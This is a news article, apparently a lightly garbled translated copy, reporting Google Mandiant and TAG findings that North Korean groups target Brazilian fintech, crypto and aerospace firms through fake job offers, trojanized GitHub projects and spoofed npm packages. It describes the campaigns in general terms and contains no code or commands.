Fintech

North Korean hackers are targeting Brazilian fintech with sophisticated phishing tactics

Published

7 months ago

on

North Korea-related threat actors have accounted for a third of all phishing activity against Brazil since 2020, as the country’s emergence as an influential power has attracted the attention of cyber espionage groups.

“Actors supported by the North Korean government have targeted the Brazilian government and Brazil’s aerospace, technology and financial services sectors,” Google’s Mandiant and Threat Analysis Group (TAG) divisions said. She said in a joint report released this week.

“Similar to their targeting interests in other regions, cryptocurrency and financial technology companies have been the focus of attention, and at least three North Korean groups have targeted Brazilian cryptocurrency and fintech companies.”

Among these groups stands out a threat actor identified as UNC4899 (aka Jade Sleet, PUKCHONG, and TraderTraitor), which targeted cryptocurrency professionals with a Trojanized Python app packed with malware.

The attack chains involve reaching out to potential targets via social media and sending a benign PDF document containing a job description for a purported job opportunity at a well-known cryptocurrency company.

If the victim expresses interest in the job posting, the threat actor sends a second harmless PDF document with a skills questionnaire and instructions for completing a coding assignment by downloading a project from GitHub.

“The project was a Trojanized Python app for retrieving cryptocurrency prices that was modified to reach an attacker-controlled domain to retrieve a second-stage payload if specific conditions were met,” Mandiant and TAG researchers said.

This isn’t the first time UNC4899, attributed to the 2023 JumpCloud hack, has exploited this approach. In July 2023, GitHub warned of a social engineering attack that attempted to trick employees working at blockchain, cryptocurrency, online gambling, and cybersecurity companies into running code hosted in a GitHub repository using bogus npm packages.

Work-themed social engineering campaigns are a recurring theme among North Korean hacking groups, with the tech giant also spotting a campaign orchestrated by a group it monitors as PAEKTUSAN to deliver a C++ downloader malware called AGAMEMNON via Microsoft Word attachments embedded in phishing emails.

“In one example, PAEKTUSAN created an account impersonating a human resources director at a Brazilian aerospace company and used it to send phishing emails to employees of a second Brazilian aerospace company,” the researchers noted, adding that campaigns are consistent with a long-lasting activity tracked as Operation Dream Job.

“In a separate campaign, PAEKTUSAN masqueraded as a recruiter at a major U.S. aerospace company and contacted professionals in Brazil and other regions via email and social media about potential job opportunities.”

Google also said it blocked attempts by another North Korean group dubbed PRONTO to target diplomats with bait related to denuclearization and news to get them to visit credential harvesting pages or provide their login information to view a purported PDF document.

The development comes weeks after Microsoft shed light on a previously undocumented threat actor of North Korean origin, codenamed Moonstone sleetwhich has identified individuals and organizations in the software and information technology, education and defense sectors with both ransomware and espionage attacks.

Among Moonstone Sleet’s notable tactics is malware distribution through spoofed npm packages published on the npm registry, mirroring that of UNC4899. That said, the packages associated with the two clusters carry distinct code styles and structures.

“The Jade Sleet packages, discovered during the summer of 2023, were… designed to work in pairswith each pair published by a separate npm user account to distribute its malicious functionality,” Checkmarx researchers Tzachi Zornstein and Yehuda Gelb She said.

“In contrast, packages released in late 2023 and early 2024 took a leaner, single-package approach that ran their payload immediately upon installation. In Q2 2024, packages increased in complexity, with attackers adding obfuscation and also targeting Linux systems.”

Regardless of the differences, the tactic abuses the trust users place in open source repositories, allowing threat actors to reach a broader audience and increasing the likelihood that one of their malicious packages could be inadvertently installed by unwitting developers.

The revelation is significant, not least because it marks an expansion of Moonstone Sleet’s malware distribution mechanism, which previously relied on spreading fake npm packages using LinkedIn and freelancer websites.

The findings also follow the discovery of a new one social engineering campaign undertaken by countries linked to North Korea Kimsuky Group in which he reportedly impersonated the Reuters news agency to target North Korean human rights activists and spread information-stealing malware under the guise of an interview request. Genians.

Did you find this article interesting? Follow us on Twitter AND LinkedIn to read the most exclusive content we publish.


Source

Related Topics:

Leave a Reply

Your email address will not be published. Required fields are marked *

Información básica sobre protección de datos Ver más

  • Responsable: Miguel Mamador.
  • Finalidad:  Moderar los comentarios.
  • Legitimación:  Por consentimiento del interesado.
  • Destinatarios y encargados de tratamiento:  No se ceden o comunican datos a terceros para prestar este servicio. El Titular ha contratado los servicios de alojamiento web a Banahosting que actúa como encargado de tratamiento.
  • Derechos: Acceder, rectificar y suprimir los datos.
  • Información Adicional: Puede consultar la información detallada en la Política de Privacidad.

Trending

Exit mobile version